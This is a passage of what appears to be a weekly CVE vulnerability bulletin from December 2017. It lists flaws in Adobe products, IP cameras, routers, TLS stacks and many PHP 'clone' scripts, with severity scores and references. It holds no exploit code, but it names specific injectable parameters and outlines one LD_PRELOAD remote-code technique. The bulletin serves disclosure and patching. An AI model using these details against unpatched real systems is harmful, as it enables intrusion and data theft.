  Published: 2017-12-09 | CVSS Score: 9.3 | CVE-2017-16411 | BID, SECTRACK, CONFIRM

adobe -- acrobat_and_reader | An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability occurs because of a computation that reads data that is past the end of the target buffer; the computation is part of the XPS conversion module, when handling a JPEG resource. The use of an invalid (out-of-range) pointer offset during access of internal data structure fields causes the vulnerability. A successful attack can lead to sensitive data exposure. | 2017-12-09 | 9.3 | CVE-2017-16412 (BID, SECTRACK, CONFIRM)
adobe -- acrobat | An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. The vulnerability is caused by a computation that writes data past the end of the intended buffer; the computation is part of the XPS to PDF conversion module, when processing TIFF files. The vulnerability is a result of an out of range pointer offset that is used to access sub-elements of an internal data structure. An attacker can potentially leverage the vulnerability to corrupt sensitive data or execute arbitrary code. | 2017-12-09 | 9.3 | CVE-2017-16413 (BID, SECTRACK, CONFIRM)
adobe -- acrobat | An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability occurs as a result of a computation that reads data that is past the end of the target buffer; the computation is a part of the JavaScript API module responsible for form field computation. The use of an invalid (out-of-range) pointer offset during access of internal data structure fields causes the vulnerability. A successful attack can lead to sensitive data exposure. | 2017-12-09 | 9.3 | CVE-2017-16414 (BID, SECTRACK, CONFIRM)
adobe -- acrobat | An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. The vulnerability is caused by a computation that writes data past the end of the intended buffer; the computation is a part of the functionality that handles font encodings. The vulnerability is a result of an out of range pointer offset that is used to access sub-elements of an internal data structure. An attacker can potentially leverage the vulnerability to corrupt sensitive data or execute arbitrary code. | 2017-12-09 | 9.3 | CVE-2017-16415 (BID, SECTRACK, CONFIRM)
adobe -- acrobat | An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. The vulnerability is caused by a computation that writes data past the end of the intended buffer; the computation is part of the image conversion module that handles Enhanced Metafile Format Plus (EMF+) data. The vulnerability is a result of an out of range pointer offset that is used to access sub-elements of an internal data structure. An attacker can potentially leverage the vulnerability to corrupt sensitive data or execute arbitrary code. | 2017-12-09 | 9.3 | CVE-2017-16416 (BID, SECTRACK, CONFIRM)
adobe -- acrobat | An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability occurs as a result of a computation that reads data that is past the end of the target buffer; the computation is a part of the font parsing module. The use of an invalid (out-of-range) pointer offset during access of internal data structure fields causes the vulnerability. A successful attack can lead to sensitive data exposure. | 2017-12-09 | 9.3 | CVE-2017-16417 (BID, SECTRACK, CONFIRM)
adobe -- acrobat | An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability occurs as a result of a computation that reads data that is past the end of the target buffer; the computation is a part of the image conversion module that handles XPS files. The use of an invalid (out-of-range) pointer offset during access of internal data structure fields causes the vulnerability. A successful attack can lead to sensitive data exposure. | 2017-12-09 | 9.3 | CVE-2017-16418 (BID, SECTRACK, CONFIRM)
adobe -- acrobat | An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability occurs as a result of a computation that reads data that is past the end of the target buffer; the computation is in the part of the JavaScript engine that handles annotation abstraction. The use of an invalid (out-of-range) pointer offset during access of internal data structure fields causes the vulnerability. A successful attack can lead to sensitive data exposure. | 2017-12-09 | 9.3 | CVE-2017-16420 (BID, SECTRACK, CONFIRM)
adobe -- photoshop | An issue was discovered in Adobe Photoshop 18.1.1 (2017.1.1) and earlier versions. An exploitable memory corruption vulnerability exists. Successful exploitation could lead to arbitrary code execution. | 2017-12-09 | 7.5 | CVE-2017-11303 (BID, SECTRACK, CONFIRM)
adobe -- photoshop | An issue was discovered in Adobe Photoshop 18.1.1 (2017.1.1) and earlier versions. An exploitable use-after-free vulnerability exists. Successful exploitation could lead to arbitrary code execution. | 2017-12-09 | 7.5 | CVE-2017-11304 (BID, SECTRACK, CONFIRM)

Medium Vulnerabilities

Primary Vendor -- Product | Description | Published | CVSS Score | Source & Patch Info
adobe -- acrobat | An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability is an instance of a security bypass vulnerability when handling XFDF files. | 2017-12-09 | 4.3 | CVE-2017-16361 (BID, SECTRACK, CONFIRM)
adobe -- acrobat | An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability is an instance of a security bypass vulnerability in the AcroPDF plugin. | 2017-12-09 | 5.0 | CVE-2017-16366 (BID, SECTRACK, CONFIRM)
adobe -- acrobat | An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability is an instance of a Same Origin Policy security bypass vulnerability, affecting files on the local system, etc. | 2017-12-09 | 4.3 | CVE-2017-16369 (BID, SECTRACK, CONFIRM)
adobe -- acrobat | An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. The issue is a stack exhaustion problem within the JavaScript API, where the computation does not correctly control the amount of recursion that can happen with respect to system resources. | 2017-12-09 | 4.3 | CVE-2017-16419 (BID, SECTRACK, CONFIRM)
adobe -- connect | An issue was discovered in Adobe Connect 9.6.2 and earlier versions. A reflected cross-site scripting vulnerability exists that can result in information disclosure. | 2017-12-09 | 4.3 | CVE-2017-11287 (BID, SECTRACK, CONFIRM)
adobe -- connect | An issue was discovered in Adobe Connect 9.6.2 and earlier versions. A reflected cross-site scripting vulnerability exists that can result in information disclosure. | 2017-12-09 | 4.3 | CVE-2017-11288 (BID, SECTRACK, CONFIRM)
adobe -- connect | An issue was discovered in Adobe Connect 9.6.2 and earlier versions. A reflected cross-site scripting vulnerability exists that can result in information disclosure. | 2017-12-09 | 4.3 | CVE-2017-11289 (BID, SECTRACK, CONFIRM)
adobe -- connect | An issue was discovered in Adobe Connect 9.6.2 and earlier versions. A UI Redress (or Clickjacking) vulnerability exists. This issue has been resolved by adding a feature that enables Connect administrators to protect users from UI redressing (or clickjacking) attacks. | 2017-12-09 | 4.3 | CVE-2017-11290 (BID, SECTRACK, CONFIRM)
adobe -- connect | An issue was discovered in Adobe Connect 9.6.2 and earlier versions. A Server-Side Request Forgery (SSRF) vulnerability exists that could be abused to bypass network access controls. | 2017-12-09 | 6.4 | CVE-2017-11291 (BID, SECTRACK, CONFIRM)
adobe -- digital_editions | An issue was discovered in Adobe Digital Editions 4.5.6 and earlier versions. Adobe Digital Editions parses crafted XML files in an unsafe manner, which could lead to sensitive information disclosure. | 2017-12-09 | 4.3 | CVE-2017-11273 (BID, SECTRACK, CONFIRM)
adobe -- digital_editions | An issue was discovered in Adobe Digital Editions 4.5.6 and earlier versions. An exploitable memory corruption vulnerability exists, which could lead to disclosure of memory addresses. | 2017-12-09 | 5.0 | CVE-2017-11297 (BID, SECTRACK, CONFIRM)
adobe -- digital_editions | An issue was discovered in Adobe Digital Editions 4.5.6 and earlier versions. An exploitable memory corruption vulnerability exists, which could lead to disclosure of memory addresses. | 2017-12-09 | 5.0 | CVE-2017-11298 (BID, SECTRACK, CONFIRM)
adobe -- digital_editions | An issue was discovered in Adobe Digital Editions 4.5.6 and earlier versions. An exploitable memory corruption vulnerability exists, which could lead to disclosure of memory addresses. | 2017-12-09 | 5.0 | CVE-2017-11299 (BID, SECTRACK, CONFIRM)
adobe -- digital_editions | An issue was discovered in Adobe Digital Editions 4.5.6 and earlier versions. An exploitable memory corruption vulnerability exists, which could lead to disclosure of memory addresses. | 2017-12-09 | 5.0 | CVE-2017-11300 (BID, SECTRACK, CONFIRM)
adobe -- digital_editions | An issue was discovered in Adobe Digital Editions 4.5.6 and earlier versions. An exploitable memory corruption vulnerability exists, which could lead to disclosure of memory addresses. | 2017-12-09 | 5.0 | CVE-2017-11301 (BID, SECTRACK, CONFIRM)
adobe -- experience_manager | An issue was discovered in Adobe Experience Manager 6.3, 6.2, 6.1, 6.0. A cross-site scripting vulnerability in Apache Sling Servlets Post 2.3.20 has been resolved in Adobe Experience Manager. | 2017-12-09 | 4.3 | CVE-2017-11296 (BID, SECTRACK, CONFIRM)
adobe -- experience_manager | An issue was discovered in Adobe Experience Manager 6.3, 6.2, 6.1, 6.0. Adobe Experience Manager has a reflected cross-site scripting vulnerability in the HtmlRendererServlet. | 2017-12-09 | 4.3 | CVE-2017-3109 (BID, SECTRACK, CONFIRM)
adobe -- experience_manager | An issue was discovered in Adobe Experience Manager 6.3, 6.2, 6.1, 6.0. Sensitive tokens are included in http GET requests under certain circumstances. | 2017-12-09 | 5.0 | CVE-2017-3111 (BID, SECTRACK, CONFIRM)

Low Vulnerabilities

Primary Vendor -- Product | Description | Published | CVSS Score | Source & Patch Info
There were no low vulnerabilities recorded this week.

Severity Not Yet Assigned

Primary Vendor -- Product | Description | Published | CVSS Score | Source & Patch Info
abiword -- abiword | af/util/xp/ut_go_file.cpp in AbiWord 3.0.2-2 does not validate strings before launching the program specified by the BROWSER environment variable, which might allow remote attackers to conduct argument-injection attacks via a crafted URL. | 2017-12-14 | not yet calculated | CVE-2017-17529 (MISC)
acdsee -- acdsee_ultimate_10.0.0.292 | A memory corruption vulnerability exists in the .PSD parsing functionality of ACDSee Ultimate 10.0.0.292. A specially crafted .PSD file can cause an out of bounds write vulnerability resulting in potential code execution. An attacker can send a specific .PSD file to trigger this vulnerability. | 2017-12-11 | not yet calculated | CVE-2017-2886 (BID, MISC)
acti -- acti_cameras | ACTi cameras including the D, B, I, and E series using firmware version A1D-500-V6.11.31-AC use non-random default credentials across all devices. A remote attacker can take complete control of a device using default admin credentials. | 2017-12-15 | not yet calculated | CVE-2017-3186 (BID, MISC, MISC, CERT-VN)
acti -- acti_cameras | ACTi cameras including the D, B, I, and E series using firmware version A1D-500-V6.11.31-AC fail to properly restrict access to the factory reset page. An unauthenticated, remote attacker can exploit this vulnerability by directly accessing the http://ift.tt/2mxsDrj page. This will allow an attacker to perform a factory reset on the device, leading to a denial of service condition or the ability to make use of default credentials (CVE-2017-3186). | 2017-12-15 | not yet calculated | CVE-2017-3184 (BID, MISC, MISC, CERT-VN)
acti -- acti_cameras | ACTi cameras including the D, B, I, and E series using firmware version A1D-500-V6.11.31-AC have a web application that uses the GET method to process requests that contain sensitive information such as user account name and password, which can expose that information through the browser's history, referrers, web logs, and other sources. | 2017-12-15 | not yet calculated | CVE-2017-3185 (BID, MISC, MISC, CERT-VN)
adobe -- acrobat | An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. An exploitable memory corruption vulnerability exists. Successful exploitation could lead to arbitrary code execution. | 2017-12-09 | not yet calculated | CVE-2017-11293 (BID, SECTRACK, CONFIRM)
adobe -- dng | An issue was discovered in Adobe DNG Converter 9.12.1 and earlier versions. An exploitable memory corruption vulnerability exists. Successful exploitation could lead to arbitrary code execution. | 2017-12-09 | not yet calculated | CVE-2017-11295 (BID, CONFIRM)
adobe -- flash_player | An issue was discovered in Adobe Flash Player 27.0.0.183 and earlier versions. This vulnerability is an instance of a use after free vulnerability in the Primetime SDK metadata functionality. The mismatch between an old and a new object can provide an attacker with unintended memory access -- potentially leading to code corruption, control-flow hijack, or an information leak attack. Successful exploitation could lead to arbitrary code execution. | 2017-12-09 | not yet calculated | CVE-2017-11225 (BID, SECTRACK, REDHAT, CONFIRM, GENTOO)
adobe -- flash_player | An issue was discovered in Adobe Flash Player 27.0.0.183 and earlier versions. This vulnerability occurs as a result of a computation that reads data that is past the end of the target buffer; the computation is part of providing language-, region- or country-specific functionality. The use of an invalid (out-of-range) pointer offset during access of internal data structure fields causes the vulnerability. A successful attack can lead to sensitive data exposure. | 2017-12-09 | not yet calculated | CVE-2017-3114 (BID, SECTRACK, REDHAT, CONFIRM, GENTOO)
adobe -- flash_player | An issue was discovered in Adobe Flash Player 27.0.0.183 and earlier versions. This vulnerability is an instance of a use after free vulnerability in the Primetime SDK. The mismatch between an old and a new object can provide an attacker with unintended memory access -- potentially leading to code corruption, control-flow hijack, or an information leak attack. Successful exploitation could lead to arbitrary code execution. | 2017-12-09 | not yet calculated | CVE-2017-11215 (BID, SECTRACK, REDHAT, CONFIRM, GENTOO)
adobe -- flash_player | An issue was discovered in Adobe Flash Player 27.0.0.183 and earlier versions. This vulnerability occurs as a result of a computation that reads data that is past the end of the target buffer due to an integer overflow; the computation is part of the abstraction that creates an arbitrarily sized transparent or opaque bitmap image. The use of an invalid (out-of-range) pointer offset during access of internal data structure fields causes the vulnerability. A successful attack can lead to sensitive data exposure. | 2017-12-09 | not yet calculated | CVE-2017-11213 (BID, SECTRACK, REDHAT, CONFIRM, GENTOO)
adobe -- flash_player | A regression affecting Adobe Flash Player version 27.0.0.187 (and earlier versions) causes the unintended reset of the global settings preference file when a user clears browser data. | 2017-12-13 | not yet calculated | CVE-2017-11305 (BID, SECTRACK, CONFIRM)
adobe -- flash_player | An issue was discovered in Adobe Flash Player 27.0.0.183 and earlier versions. This vulnerability occurs as a result of a computation that reads data that is past the end of the target buffer; the computation is part of AdobePSDK metadata. The use of an invalid (out-of-range) pointer offset during access of internal data structure fields causes the vulnerability. A successful attack can lead to sensitive data exposure. | 2017-12-09 | not yet calculated | CVE-2017-3112 (BID, SECTRACK, REDHAT, CONFIRM, GENTOO)
adobe -- indesign | An issue was discovered in Adobe InDesign 12.1.0 and earlier versions. An exploitable memory corruption vulnerability exists. Successful exploitation could lead to arbitrary code execution. | 2017-12-09 | not yet calculated | CVE-2017-11302 (BID, SECTRACK, CONFIRM)
adobe -- shockwave | An issue was discovered in Adobe Shockwave 12.2.9.199 and earlier. An exploitable memory corruption vulnerability exists. Successful exploitation could lead to arbitrary code execution. | 2017-12-09 | not yet calculated | CVE-2017-11294 (BID, SECTRACK, CONFIRM)
amag_technologies -- symmetry_edge_network_door_controllers | Incorrect access control in AMAG Symmetry Door Edge Network Controllers (EN-1DBC Boot App 23611 03.60 and STD App 23603 03.60; EN-2DBC Boot App 24451 01.00 and STD App 2461 01.00) enables remote attackers to execute door controller commands (e.g., lock, unlock, add ID card value) by sending unauthenticated requests to the affected devices via Serial over TCP/IP, as demonstrated by a Ud command. | 2017-12-09 | not yet calculated | CVE-2017-16241 (MISC, MISC, MISC)
apache -- fineract | In Apache Fineract 0.4.0-incubating, 0.5.0-incubating, and 0.6.0-incubating, an authenticated user with client/loan/center/staff/group read permissions is able to inject malicious SQL into SELECT queries. The 'sqlSearch' parameter on a number of endpoints is not sanitized and appended directly to the query. | 2017-12-14 | not yet calculated | CVE-2017-5663 (MLIST)
apache -- synapse | Due to the presence of Apache Commons Collections 3.2.1 (commons-collections-3.2.1.jar) or previous versions, Apache Synapse 3.0.0 or all previous releases (3.0.0, 2.1.0, 2.0.0, 1.2, 1.1.2, 1.1.1) allows remote code execution attacks that can be performed by injecting specially crafted serialized objects. To mitigate the issue, upgrading to version 3.0.1 is required. In Synapse 3.0.1, Commons Collections has been updated to version 3.2.2, which contains the fix for the above-mentioned vulnerability. | 2017-12-11 | not yet calculated | CVE-2017-15708 (BID, MLIST)
asterisk -- multiple_products | A Remote Crash issue was discovered in Asterisk Open Source 13.x before 13.18.4, 14.x before 14.7.4, and 15.x before 15.1.4 and Certified Asterisk before 13.13-cert9. Certain compound RTCP packets cause a crash in the RTCP Stack. | 2017-12-13 | not yet calculated | CVE-2017-17664 (MISC, BID, MISC, MISC)
atlassian -- bamboo | Bamboo did not check that the name of a branch in a Mercurial repository contained argument parameters. An attacker who has permission to create a repository in Bamboo, edit an existing plan that has a non-linked Mercurial repository, create or edit a plan when there is at least one linked Mercurial repository that the attacker has permission to use, or commit to a Mercurial repository used by a Bamboo plan which has branch detection enabled can execute code of their choice on systems that run a vulnerable version of Bamboo Server. Versions of Bamboo starting with 2.7.0 before 6.1.6 (the fixed version for 6.1.x) and from 6.2.0 before 6.2.5 (the fixed version for 6.2.x) are affected by this vulnerability. | 2017-12-13 | not yet calculated | CVE-2017-14590 (BID, CONFIRM, CONFIRM)
atlassian -- bamboo | It was possible for double OGNL evaluation in FreeMarker templates through Struts FreeMarker tags to occur. An attacker who has restricted administration rights to Bamboo, or who hosts a website that a Bamboo administrator visits, is able to exploit this vulnerability to execute Java code of their choice on systems that run a vulnerable version of Bamboo. All versions of Bamboo before 6.1.6 (the fixed version for 6.1.x) and from 6.2.0 before 6.2.5 (the fixed version for 6.2.x) are affected by this vulnerability. | 2017-12-13 | not yet calculated | CVE-2017-14589 (BID, CONFIRM, CONFIRM)
aubio -- aubio | A NULL pointer dereference (DoS) vulnerability was found in the function aubio_source_avcodec_readframe in io/source_avcodec.c of aubio 0.4.6, which may lead to DoS when playing a crafted audio file. | 2017-12-11 | not yet calculated | CVE-2017-17554 (MISC)
bernard_parisse_giac -- bernard_parisse_giac | Input.cc in Bernard Parisse Giac 1.2.3.57 does not validate strings before launching the program specified by the BROWSER environment variable, which might allow remote attackers to conduct argument-injection attacks via a crafted URL. | 2017-12-14 | not yet calculated | CVE-2017-17526 (MISC)
bob_hepple_gjots2 -- bob_hepple_gjots2 | lib/gui.py in Bob Hepple gjots2 2.4.1 does not validate strings before launching the program specified by the BROWSER environment variable, which might allow remote attackers to conduct argument-injection attacks via a crafted URL. | 2017-12-14 | not yet calculated | CVE-2017-17535 (MISC)

boxug -- trape | Trape before 2017-11-05 has XSS via the /nr red parameter, the /nr vId parameter, the /register User-Agent HTTP header, the /register country parameter, the /register countryCode parameter, the /register cpu parameter, the /register isp parameter, the /register lat parameter, the /register lon parameter, the /register org parameter, the /register query parameter, the /register region parameter, the /register regionName parameter, the /register timezone parameter, the /register vId parameter, the /register zip parameter, or the /tping id parameter. | 2017-12-16 | not yet calculated | CVE-2017-17714 (MISC, MISC, MISC)
boxug -- trape | Trape before 2017-11-05 has SQL injection via the /nr red parameter, the /nr vId parameter, the /register User-Agent HTTP header, the /register country parameter, the /register countryCode parameter, the /register cpu parameter, the /register isp parameter, the /register lat parameter, the /register lon parameter, the /register org parameter, the /register query parameter, the /register region parameter, the /register regionName parameter, the /register timezone parameter, the /register vId parameter, the /register zip parameter, or the /tping id parameter. | 2017-12-16 | not yet calculated | CVE-2017-17713 (MISC, MISC, MISC, MISC, MISC)
cisco -- asa_5500_series_routers | A vulnerability in the TLS protocol implementation of legacy Cisco ASA 5500 Series (ASA 5505, 5510, 5520, 5540, and 5550) devices could allow an unauthenticated, remote attacker to access sensitive information, aka a Return of Bleichenbacher's Oracle Threat (ROBOT) attack. An attacker could iteratively query a server running a vulnerable TLS stack implementation to perform cryptanalytic operations that may allow decryption of previously captured TLS sessions. Cisco Bug IDs: CSCvg97652. | 2017-12-15 | not yet calculated | CVE-2017-12373 (CONFIRM)
citrix -- multiple_products | Citrix NetScaler Application Delivery Controller (ADC) and NetScaler Gateway 10.5 before build 67.13, 11.0 before build 71.22, 11.1 before build 56.19, and 12.0 before build 53.22 might allow remote attackers to decrypt TLS ciphertext data by leveraging a Bleichenbacher RSA padding oracle, aka a ROBOT attack. | 2017-12-13 | not yet calculated | CVE-2017-17382 (BID, SECTRACK, MISC, CONFIRM, CERT-VN)
citrix -- multiple_products | Citrix NetScaler Application Delivery Controller (ADC) and NetScaler Gateway 10.5 before build 67.13, 11.0 before build 71.22, 11.1 before build 56.19, and 12.0 before build 53.22 allow remote attackers to obtain sensitive information from the backend client TLS handshake by leveraging use of TLS with Client Certificates and a Diffie-Hellman Ephemeral (DHE) key exchange. | 2017-12-13 | not yet calculated | CVE-2017-17549 (BID, SECTRACK, CONFIRM)
commvault -- edge_communication_service | Commvault Edge Communication Service (cvd) prior to version 11 SP7 or version 11 SP6 with hotfix 590 is prone to a stack-based buffer overflow vulnerability that could lead to arbitrary code execution with administrative privileges. | 2017-12-15 | not yet calculated | CVE-2017-3195 (CONFIRM, MISC, BID, EXPLOIT-DB, CERT-VN)
crowdfunding_software -- realestate_crowdfunding_script | Realestate Crowdfunding Script 2.7.2 has SQL Injection via the single-cause.php pid parameter. | 2017-12-13 | not yet calculated | CVE-2017-17591 (MISC)
d-link -- dir-130_firmware_version_1.23_and_dir-330_firmware_version_1.12 | D-Link DIR-130 firmware version 1.23 and DIR-330 firmware version 1.12 are vulnerable to authentication bypass of the remote login page. A remote attacker that can access the remote management login page can manipulate the POST request in such a manner as to access some administrator-only pages such as tools_admin.asp without credentials. | 2017-12-15 | not yet calculated | CVE-2017-3191 (MISC, CERT-VN, MISC, MISC)
d-link -- dir-130_firmware_version_1.23_and_dir-330_firmware_version_1.12 | D-Link DIR-130 firmware version 1.23 and DIR-330 firmware version 1.12 do not sufficiently protect administrator credentials. The tools_admin.asp page discloses the administrator password in base64 encoding in the returned web page. A remote attacker with access to this page (potentially through an authentication bypass such as CVE-2017-3191) may obtain administrator credentials for the device. | 2017-12-15 | not yet calculated | CVE-2017-3192 (MISC, CERT-VN, MISC, MISC)
d-link -- multiple_devices | Multiple D-Link devices including the DIR-850L firmware versions 1.14B07 and 2.07.B05 contain a stack-based buffer overflow vulnerability in the web administration interface HNAP service. | 2017-12-15 | not yet calculated | CVE-2017-3193 (BID, MISC, MISC, CERT-VN, MISC)
elemental_path -- cognitoys_dino_smart_toys | Elemental Path's CogniToys Dino smart toys through firmware version 0.0.794 share a fixed small pool of hardcoded keys, allowing a remote attacker to use a different Dino device to decrypt VoIP traffic between a child's Dino and remote server. | 2017-12-11 | not yet calculated | CVE-2017-8866 (MISC)
elemental_path -- cognitoys_dino_smart_toys | Elemental Path's CogniToys Dino smart toys through firmware version 0.0.794 use AES-128 with ECB mode to encrypt voice traffic between the device and remote server, allowing a malicious user to map encrypted traffic to a particular AES key index and gain further access to eavesdrop on privacy-sensitive voice communication of a child and their Dino device. | 2017-12-11 | not yet calculated | CVE-2017-8867 (MISC)
elemental_path -- cognitoys_dino_smart_toys | Elemental Path's CogniToys Dino smart toys through firmware version 0.0.794 do not provide sufficient protections against capture-replay attacks, allowing an attacker on the network to replay VoIP traffic between a Dino device and remote server to any other Dino device. | 2017-12-11 | not yet calculated | CVE-2017-8865 (MISC)
embedthis -- goahead | Embedthis GoAhead before 3.6.5 allows remote code execution if CGI is enabled and a CGI program is dynamically linked. This is a result of initializing the environment of forked CGI scripts using untrusted HTTP request parameters in the cgiHandler function in cgi.c. When combined with the glibc dynamic linker, this behaviour can be abused for remote code execution using special parameter names such as LD_PRELOAD. An attacker can POST their shared object payload in the body of the request, and reference it using /proc/self/fd/0. | 2017-12-12 | not yet calculated | CVE-2017-17562 (MISC, MISC)
emc -- isilon_onefs | In EMC Isilon OneFS 8.1.0.0, 8.0.1.0 - 8.0.1.1, 8.0.0.0 - 8.0.0.4, 7.2.1.0 - 7.2.1.5, 7.2.0.x, and 7.1.1.x, a malicious compliance admin (compadmin) account user could exploit a vulnerability in isi_get_itrace or isi_get_profile maintenance scripts to run any shell script as system root on a cluster in compliance mode. This could potentially lead to an elevation of privilege for the compadmin user and violate compliance mode. | 2017-12-13 | not yet calculated | CVE-2017-14380 (CONFIRM)
erlang -- erlang | The Erlang otp TLS server answers with different TLS alerts to different error types in the RSA PKCS #1 1.5 padding. This allows an attacker to decrypt content or sign messages with the server's private key (this is a variation of the Bleichenbacher attack). | 2017-12-12 | not yet calculated | CVE-2017-1000385 (MLIST, MLIST, MLIST, BID, MISC, DEBIAN, CERT-VN)
exiv2 -- exiv2 | There is a heap-based buffer over-read in the Exiv2::Internal::PngChunk::keyTXTChunk function of pngchunk_int.cpp in Exiv2 0.26. A crafted PNG file will lead to a remote denial of service attack. | 2017-12-13 | not yet calculated | CVE-2017-17669 (MISC)
ffmpeg -- libswresample | The swri_audio_convert function in audioconvert.c in FFmpeg libswresample through 3.0.101, as used in FFmpeg 3.4.1, aubio 0.4.6, and other products, allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via a crafted audio file. | 2017-12-11 | not yet calculated | CVE-2017-17555 (MISC)
flash_seats -- flash_seats_mobile_app_for_android | Flash Seats Mobile App for Android version 1.7.9 and earlier and for iOS version 1.9.51 and earlier fails to properly validate SSL certificates provided by HTTPS connections, which may enable an attacker to conduct man-in-the-middle (MITM) attacks. | 2017-12-15 | not yet calculated | CVE-2017-3190 (BID, CERT-VN, MISC)
flippa-clone.com -- website_auction_marketplace | Website Auction Marketplace 2.0.5 has SQL Injection via the search.php cat_id parameter. | 2017-12-13 | not yet calculated | CVE-2017-17592 (MISC)
fontforge -- fontforge | uiutil.c in FontForge through 20170731 does not validate strings before launching the program specified by the BROWSER environment variable, which might allow remote attackers to conduct argument-injection attacks via a crafted URL, a different vulnerability than CVE-2017-17534. | 2017-12-14 | not yet calculated | CVE-2017-17521 (MISC)
fortinet -- forticlient_fortios | An Information Disclosure vulnerability in Fortinet FortiOS 5.6.0 to 5.6.2, 5.4.0 to 5.4.5, 5.2 and below versions allows an admin user with super_admin privileges to view the current SSL VPN web portal session info, which may contain user credentials, through the fnsysctl CLI command. | 2017-12-13 | not yet calculated | CVE-2017-7738 (BID, CONFIRM)
fortinet -- forticlient_windows | A privilege escalation in Fortinet FortiClient Windows 5.4.3 and earlier as well as 5.6.0 allows an attacker to gain privileges by exploiting the Windows "security alert" dialog that pops up when the "VPN before logon" feature is enabled and the certificate chain is untrusted. | 2017-12-14 | not yet calculated | CVE-2017-7344 (BID, CONFIRM)
fortinet -- forticlient | An Information Disclosure vulnerability in Fortinet FortiClient for Windows 5.6.0 and below versions, FortiClient for Mac OSX 5.6.0 and below versions and FortiClient SSLVPN Client for Linux 4.4.2334 and below versions allows regular users to see each other's VPN authentication credentials due to improperly secured storage locations. | 2017-12-15 | not yet calculated | CVE-2017-14184 (BID, CONFIRM)
fortunescripts.com -- N/A | Basic Job Site Script 2.0.5 has SQL Injection via the keyword parameter to /job. | 2017-12-13 | not yet calculated | CVE-2017-17642 (MISC)
fs -- amazon_clone | FS Amazon Clone 1.0 has SQL Injection via the PATH_INFO to /VerAyari. | 2017-12-13 | not yet calculated | CVE-2017-17572 (MISC)
fs -- care_clone | FS Care Clone 1.0 has SQL Injection via the searchJob.php jobType or jobFrequency parameter. | 2017-12-13 | not yet calculated | CVE-2017-17574 (MISC)
fs -- crowdfunding_clone
 
FS Crowdfunding Script 1.0 has SQL Injection via the latest_news_details.php id parameter.2017-12-13not yet calculatedCVE-2017-17578
MISC
fs -- expedia_clone
 
FS Expedia Clone 1.0 has SQL Injection via the pages.php or content.php id parameter, or the show-flight-result.php fl_orig or fl_dest parameter.2017-12-13not yet calculatedCVE-2017-17570
MISC
fs -- ebay_clone
 
FS Ebay Clone 1.0 has SQL Injection via the product.php id parameter, or the search.php category_id or sub_category_id parameter.2017-12-13not yet calculatedCVE-2017-17573
MISC
fs -- foodpanda_clone
 
FS Foodpanda Clone 1.0 has SQL Injection via the /food keywords parameter.2017-12-13not yet calculatedCVE-2017-17571
MISC
fs -- freelancer_clone
 
FS Freelancer Clone 1.0 has SQL Injection via the profile.php u parameter.2017-12-13not yet calculatedCVE-2017-17579
MISC
fs -- gigs_clone
 
FS Gigs Script 1.0 has SQL Injection via the browse-category.php cat parameter, browse-scategory.php sc parameter, or service-provider.php ser parameter.2017-12-13not yet calculatedCVE-2017-17576
MISC
fs -- groupon_clone
 
FS Groupon Clone 1.0 has SQL Injection via the item_details.php id parameter or the vendor_details.php id parameter.2017-12-13not yet calculatedCVE-2017-17575
MISC
fs -- grubhub_clone
 
FS Grubhub Clone 1.0 has SQL Injection via the /food keywords parameter.2017-12-13not yet calculatedCVE-2017-17582
MISC
fs -- imdb_clone
 
FS IMDB Clone 1.0 has SQL Injection via the movie.php f parameter, tvshow.php s parameter, or show_misc_video.php id parameter.2017-12-13not yet calculatedCVE-2017-17588
MISC
fs -- indiamart_clone
 
FS Indiamart Clone 1.0 has SQL Injection via the catcompany.php token parameter, buyleads-details.php id parameter, or company/index.php c parameter.2017-12-13not yet calculatedCVE-2017-17587
MISC
fs -- linkedin_clone
 
FS Linkedin Clone 1.0 has SQL Injection via the group.php grid parameter, profile.php fid parameter, or company_details.php id parameter.2017-12-13not yet calculatedCVE-2017-17580
MISC
fs -- makemytrip_clone
 
FS Makemytrip Clone 1.0 has SQL Injection via the show-flight-result.php fl_orig or fl_dest parameter.2017-12-13not yet calculatedCVE-2017-17584
MISC
fs -- monster_clone
 
FS Monster Clone 1.0 has SQL Injection via the Employer_Details.php id parameter.2017-12-13not yet calculatedCVE-2017-17585
MISC
fs -- olx_clone
 
FS Olx Clone 1.0 has SQL Injection via the subpage.php scat parameter or the message.php pid parameter.2017-12-13not yet calculatedCVE-2017-17586
MISC
fs -- quibids_clone
 
